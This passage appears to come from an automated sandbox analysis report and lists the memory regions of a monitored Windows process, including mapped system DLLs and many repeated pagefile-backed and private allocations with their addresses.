(normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 780 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 781 start_va = 0x7ffb24c50000 end_va = 0x7ffb24c89fff monitored = 0 entry_point = 0x7ffb24c58d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 782 start_va = 0x7ffb24c90000 end_va = 0x7ffb24cb6fff monitored = 0 entry_point = 0x7ffb24ca0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 783 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 784 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 785 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 786 start_va = 0x7ffb24fe0000 end_va = 0x7ffb25078fff monitored = 0 entry_point = 0x7ffb2500f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 787 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 788 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 789 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 790 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 791 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 792 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 793 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 794 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 795 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 796 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 797 start_va = 0x7ffb25ea0000 end_va = 0x7ffb25ef4fff monitored = 0 entry_point = 0x7ffb25eb7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 798 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 799 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 800 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 801 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 802 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 803 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 804 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 805 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 806 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 807 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 808 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 809 start_va = 0x7ffb28080000 end_va = 0x7ffb281d9fff monitored = 0 entry_point = 0x7ffb280c38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 810 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 811 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 812 start_va = 0x7ffb284c0000 end_va = 0x7ffb288e8fff monitored = 0 entry_point = 0x7ffb284e8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 813 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 814 start_va = 0x7ffb289c0000 end_va = 0x7ffb28a2efff monitored = 0 entry_point = 0x7ffb289e5f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 815 start_va = 0x7ffb28a40000 end_va = 0x7ffb28a47fff monitored = 0 entry_point = 0x7ffb28a41ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 816 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 817 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 819 start_va = 0x520000 end_va = 0x535fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 820 start_va = 0x10970000 end_va = 0x109effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010970000" filename = "" Region: id = 821 start_va = 0x96f0000 end_va = 0x988ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096f0000" filename = "" Region: id = 822 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 823 start_va = 0x109f0000 end_va = 0x10a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000109f0000" filename = "" Region: id = 824 start_va = 0x10a70000 end_va = 0x10aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010a70000" filename = "" Region: id = 825 start_va = 0x540000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 826 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 827 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 828 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 829 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 830 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 831 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 832 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 833 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 834 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 835 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 836 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 837 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 838 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 839 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 840 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 841 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 842 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 843 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 844 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 845 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 846 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 847 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 848 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 849 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 850 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 851 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 852 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 853 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 854 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 855 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 856 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 857 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 858 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 859 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 860 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 861 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 862 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 863 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 864 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 865 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 866 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 867 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 868 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 869 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 870 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 871 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 872 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 873 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 874 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 875 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 876 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 877 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 878 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 879 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 880 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 881 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 882 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 883 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 884 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 885 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 886 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 887 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 888 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 889 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 890 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 891 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 892 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 893 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 894 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 895 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 896 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 897 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 898 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 899 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 900 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 901 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 902 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 903 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 904 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 905 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 906 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 907 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 908 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 909 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 910 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 911 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 912 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 913 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 914 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 915 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 916 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 917 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 918 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 919 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 920 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 921 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 922 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 923 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 924 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 925 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 926 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 927 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 928 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 929 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 930 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 931 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 932 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 933 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 934 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 935 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 936 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 937 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 938 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 939 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 940 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 941 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 942 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 943 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 944 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename 